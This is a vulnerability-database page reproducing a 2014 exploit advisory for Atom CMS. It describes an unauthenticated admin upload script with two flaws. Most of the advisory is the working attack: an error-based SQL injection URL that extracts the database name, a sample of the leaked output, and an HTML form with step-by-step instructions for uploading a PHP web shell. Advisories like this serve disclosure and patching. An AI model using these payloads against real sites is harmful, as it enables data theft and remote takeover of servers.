Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Atom CMS Shell Upload / SQL Injection

🗓️ 07 Jul 2014 00:00:00Reported by Jagriti SahuType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 32 Views

Atom CMS SQL Injection and file upload vulnerability discovered in 201

Code
`##################################################################################################  
#Exploit Title : Atom CMS SQL Injection and file upload vulnerability  
#Author : Jagriti Sahu  
#Vendor : https://github.com/thedigicraft/Atom.CMS  
#Date : 07/07/2014  
#Discovered at : IndiShell Lab  
#Love to : Surbhi, Mradula and Harry  
##################################################################################################  
  
////////////////////////  
/// Overview:  
////////////////////////  
Atom CMS suffers from remote SQL injection and php shell   
uploadvulnerability.  
both vulnerabilities are of high risk, SQL injection will expose data   
stored in database whereas unrestricted file upload will cause php shell   
on server  
  
///////////////////////////////  
// Vulnerability Description:  
///////////////////////////////  
vulnerability is due to /admin/uploads.php file in which there is no   
check who is accessing it(this file is only for admin user but a guest   
user can also access it)  
parameter $_GET[ 'id' ] is not getting filtered before supplying its   
data to sql queries which arising sql injection exploit  
and avatar image upload code is not checking whether file is an image   
or other kind of file which leads to php shell upload  
  
  
///////////////////////  
/// exploit code ////  
///////////////////////  
  
  
SQL injection exploitation  
==========================  
  
http://127.0.0.1/acms/admin/uploads.php?id=1 and(select 1 FROM(select   
count(*),concat((select (select concat(database())) FROM   
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM   
information_schema.tables GROUP BY x)a)  
  
in result you will get database name in last line of the message on the   
page  
  
UPDATE users SET avatar = '1404709440490.' WHERE id = 1 and(select 1   
FROM(select count(*),concat((select (select concat(database())) FROM   
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM   
information_schema.tables GROUP BY x)a)  
Duplicate entry 'acms1' for key 'group_key'  
  
  
File upload exploitation  
==========================  
  
  
<form action="http://127.0.0.1/atom_cms/admin/uploads.php"   
method="post"  
enctype="multipart/form-data">  
<label for="file">Filename:</label>  
<input type="file" name="file" id="file"><br>  
<input type="submit" name="submit" value="exploit">  
</form>  
  
  
save this code on your machine as exploit.html  
open it with web browser  
brows your shell and click "exploit" button  
shell will be under directory  
  
http://127.0.0.1/atom_cms/uploads/  
  
/////////////////////  
end of exploit code  
////////////////////  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Jul 2014 00:00Current
0.3Low risk
Vulners AI Score0.3
atom cmssql injectionfile uploadhigh riskphp shellremoteexploitindishell labvulnerabilitydatabaseavatar imageunrestricted upload
32